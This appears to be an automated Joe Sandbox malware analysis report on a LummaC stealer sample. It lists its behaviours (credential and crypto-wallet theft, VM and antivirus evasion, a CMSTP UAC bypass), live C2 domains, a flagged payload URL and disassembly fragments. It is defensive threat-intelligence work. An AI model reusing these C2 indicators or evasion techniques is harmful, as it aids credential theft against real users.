Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SET_UP.exe

Overview

General Information

Sample name:SET_UP.exe
Analysis ID:1580732
MD5:117c82db1bc3c31c9196bd4a949f3358
SHA1:5ca11fd4cff68324465dc3ea5a4d2c7e5bd2dd4d
SHA256:f155b4c6f26be1e233572d98655e2b997209142a3c01cdc25c389f14f7ff50b3
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected UAC Bypass using CMSTP
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SET_UP.exe (PID: 6556 cmdline: "C:\Users\user\Desktop\SET_UP.exe" MD5: 117C82DB1BC3C31C9196BD4A949F3358)
    • VER7RSX5CP4YEKECQGJ84KT.exe (PID: 5300 cmdline: "C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe" MD5: 2A2989ED741C431F4A3276264F7BDB61)
      • VER7RSX5CP4YEKECQGJ84KT.tmp (PID: 2680 cmdline: "C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp" /SL5="$20426,7416882,845824,C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe" MD5: A62041070E18901131CBBE7825EC4EC7)
        • VER7RSX5CP4YEKECQGJ84KT.exe (PID: 5496 cmdline: "C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe" /VERYSILENT /NORESTART MD5: 2A2989ED741C431F4A3276264F7BDB61)
          • VER7RSX5CP4YEKECQGJ84KT.tmp (PID: 5800 cmdline: "C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp" /SL5="$30426,7416882,845824,C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe" /VERYSILENT /NORESTART MD5: A62041070E18901131CBBE7825EC4EC7)
            • timeout.exe (PID: 1352 cmdline: "timeout" 9 MD5: 100065E21CFBBDE57CBA2838921F84D6)
              • conhost.exe (PID: 3084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 7160 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 4632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 6560 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 2504 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 7060 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 6532 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 5608 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 6404 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 6648 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 6672 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 6816 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 7052 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 7076 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 7156 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 5232 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 5596 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 5672 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 2916 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 1868 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • IUService.exe (PID: 1284 cmdline: "C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe" MD5: 0588CE0C39DA3283E779C1D5B21D283B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["tentabatte.lat", "wordyfindy.lat", "talkynicer.lat", "manyrestro.lat", "laborersquei.click", "curverpluch.lat", "bashfulacid.lat", "slipperyloo.lat", "shapestickyr.lat"], "Build id": "hRjzG3--ELVIRA"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Roaming\UltraMedia\is-36S8B.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
        • 0x4e56d:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
        00000000.00000003.1876587770.000000000089A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.1826911184.0000000000899000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.1897227227.000000000089E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                Click to see the 7 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                34.2.IUService.exe.50000000.7.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                  34.2.IUService.exe.931cb29.2.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    34.2.IUService.exe.931cb29.2.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                    • 0x13396c:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                    • 0x133bf8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                    • 0x1339f7:$s1: CoGetObject
                    • 0x133c83:$s1: CoGetObject
                    • 0x133950:$s2: Elevation:Administrator!new:
                    • 0x133bdc:$s2: Elevation:Administrator!new:
                    34.2.IUService.exe.9361bf6.5.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                      34.2.IUService.exe.9361bf6.5.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                      • 0xee89f:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                      • 0xeeb2b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                      • 0xee92a:$s1: CoGetObject
                      • 0xeebb6:$s1: CoGetObject
                      • 0xee883:$s2: Elevation:Administrator!new:
                      • 0xeeb0f:$s2: Elevation:Administrator!new:
                      Click to see the 2 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-25T22:17:12.751979+010020283713Unknown Traffic192.168.2.449730104.21.89.250443TCP
                      2024-12-25T22:17:14.752659+010020283713Unknown Traffic192.168.2.449731104.21.89.250443TCP
                      2024-12-25T22:17:16.911417+010020283713Unknown Traffic192.168.2.449732104.21.89.250443TCP
                      2024-12-25T22:17:19.240090+010020283713Unknown Traffic192.168.2.449733104.21.89.250443TCP
                      2024-12-25T22:17:21.583075+010020283713Unknown Traffic192.168.2.449736104.21.89.250443TCP
                      2024-12-25T22:17:24.187670+010020283713Unknown Traffic192.168.2.449739104.21.89.250443TCP
                      2024-12-25T22:17:26.263533+010020283713Unknown Traffic192.168.2.449741104.21.89.250443TCP
                      2024-12-25T22:17:28.331819+010020283713Unknown Traffic192.168.2.449743104.21.89.250443TCP
                      2024-12-25T22:17:31.032314+010020283713Unknown Traffic192.168.2.449744172.67.214.186443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-25T22:17:13.528341+010020546531A Network Trojan was detected192.168.2.449730104.21.89.250443TCP
                      2024-12-25T22:17:15.500846+010020546531A Network Trojan was detected192.168.2.449731104.21.89.250443TCP
                      2024-12-25T22:17:29.105041+010020546531A Network Trojan was detected192.168.2.449743104.21.89.250443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-25T22:17:13.528341+010020498361A Network Trojan was detected192.168.2.449730104.21.89.250443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-25T22:17:15.500846+010020498121A Network Trojan was detected192.168.2.449731104.21.89.250443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-25T22:17:31.931874+010020084381A Network Trojan was detected172.67.214.186443192.168.2.449744TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-25T22:17:17.904222+010020480941Malware Command and Control Activity Detected192.168.2.449732104.21.89.250443TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for URL or domain
                      Source: https://neqi.shop/sdgjyut/psh.txt#Avira URL Cloud: Label: malware
                      Found malware configuration
                      Source: SET_UP.exe.6556.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["tentabatte.lat", "wordyfindy.lat", "talkynicer.lat", "manyrestro.lat", "laborersquei.click", "curverpluch.lat", "bashfulacid.lat", "slipperyloo.lat", "shapestickyr.lat"], "Build id": "hRjzG3--ELVIRA"}
                      Multi AV Scanner detection for submitted file
                      Source: SET_UP.exeVirustotal: Detection: 11%Perma Link
                      Source: SET_UP.exeReversingLabs: Detection: 15%
                      Sample uses string decryption to hide its real strings
                      Source: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmpString decryptor: bashfulacid.lat
                      Source: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmpString decryptor: tentabatte.lat
                      Source: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmpString decryptor: curverpluch.lat
                      Source: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmpString decryptor: talkynicer.lat
                      Source: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmpString decryptor: shapestickyr.lat
                      Source: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmpString decryptor: manyrestro.lat
                      Source: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmpString decryptor: slipperyloo.lat
                      Source: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmpString decryptor: wordyfindy.lat
                      Source: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmpString decryptor: laborersquei.click
                      Source: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                      Source: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                      Source: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                      Source: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                      Source: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                      Source: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmpString decryptor: hRjzG3--ELVIRA

                      Exploits

                      barindex
                      Yara detected UAC Bypass using CMSTP
                      Source: Yara matchFile source: 34.2.IUService.exe.931cb29.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.IUService.exe.9361bf6.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.IUService.exe.93627f6.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000022.00000002.2326879519.0000000009316000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: SET_UP.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: unknownHTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.4:49730 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.4:49731 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.4:49732 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.4:49733 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.4:49736 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.4:49739 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.4:49741 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.4:49743 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.214.186:443 -> 192.168.2.4:49744 version: TLS 1.2
                      Source: Binary string: wntdll.pdbUGP source: IUService.exe, 00000022.00000002.2339699051.00000000099FB000.00000004.00000020.00020000.00000000.sdmp, IUService.exe, 00000022.00000002.2343075426.0000000009D50000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: IUService.exe, 00000022.00000002.2339699051.00000000099FB000.00000004.00000020.00020000.00000000.sdmp, IUService.exe, 00000022.00000002.2343075426.0000000009D50000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5001C0CC @Sysutils@FindFirst$qqrx20System@UnicodeStringir19Sysutils@TSearchRec,@System@@UStrToPWChar$qqrx20System@UnicodeString,FindFirstFileW,@Sysutils@FindClose$qqrr19Sysutils@TSearchRec,GetLastError,34_2_5001C0CC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000C390 GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,34_2_5000C390
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5001BB34 FindFirstFileW,FindClose,@System@Move$qqrpxvpvi,34_2_5001BB34
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5001BD10 @System@@UStrToPWChar$qqrx20System@UnicodeString,FindFirstFileW,FindClose,34_2_5001BD10
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov edx, ecx0_2_0252F248
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+26h]0_2_0251F210
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, edx0_2_0250C2E0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov word ptr [ecx], si0_2_0251E297
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then lea eax, dword ptr [esp+28h]0_2_025252BE
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E0A81160h0_2_0251830F
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, eax0_2_0251830F
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, eax0_2_025233D0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0252D3AC
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then add eax, ebx0_2_0252E3AD
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov edi, eax0_2_0250A060
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-000000DAh]0_2_0252B001
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_025370C0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0252C140
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+72h]0_2_0252A1F0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E0A81160h0_2_025181F8
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov dword ptr [esi], 00000022h0_2_0252C1E0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-2341DD72h]0_2_0250F18C
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 088030A7h0_2_0251B1B0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 11A82DE9h0_2_0251B1B0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 11A82DE9h0_2_0251B1B0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 6E87DD67h0_2_0251B1B0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E87DD67h0_2_0251B1B0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 798ECF08h0_2_0251B1B0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 11A82DE9h0_2_0251B1B0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h0_2_0251B1B0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 385488F2h0_2_0253F657
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov word ptr [esi], ax0_2_0251966E
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 120360DAh0_2_02517606
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov byte ptr [edi], bl0_2_0250F6FE
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov byte ptr [edi], bl0_2_0250F6FE
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, eax0_2_0250A690
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, eax0_2_0250A690
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, eax0_2_025186BC
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h0_2_0252C710
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+38h]0_2_0250E71B
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h0_2_0252C70C
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov edx, ecx0_2_0252F7D1
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx edx, byte ptr [esi]0_2_025417F0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx ebp, word ptr [eax]0_2_025417F0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-000000C4h]0_2_0252B786
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then push ebp0_2_0250D7A3
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov edi, dword ptr [0044A38Ch]0_2_0250B47D
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then inc ebx0_2_02524410
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then jmp eax0_2_0252B490
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 37A3DD63h0_2_0253F4AA
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_0251C57D
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx ebp, word ptr [eax]0_2_02541510
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, eax0_2_0252B530
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx+4B939B60h]0_2_0252A53D
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then jmp dword ptr [00447D28h]0_2_0252A523
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0252E5D7
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, eax0_2_0252D590
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov word ptr [eax], dx0_2_02516A52
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp byte ptr [edi+eax+01h], 00000000h0_2_02529A43
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov eax, dword ptr [ebp-34h]0_2_02515A70
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then jmp dword ptr [004460D4h]0_2_02515A70
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h0_2_0251DA24
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx edx, byte ptr [esp+ebp+10h]0_2_0253AAC0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov edi, edx0_2_0253AAC0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then test eax, eax0_2_0253AAC0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov edx, dword ptr [eax]0_2_0253AAC0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov edx, ecx0_2_0252EAFA
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov dword ptr [esp+08h], ebp0_2_02527B59
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, eax0_2_0253FBB2
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx esi, byte ptr [edx]0_2_0252A810
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 138629C0h0_2_025178EC
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebp+04h]0_2_0253A947
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 8AE4A158h0_2_0251797C
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov byte ptr [edx], al0_2_0250A910
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx+40h]0_2_0252791D
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov dword ptr [ebp-14h], eax0_2_02515903
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then jmp eax0_2_0253A9D7
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+24h]0_2_025289B0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx esi, byte ptr [ebp+ecx-62h]0_2_025159BE
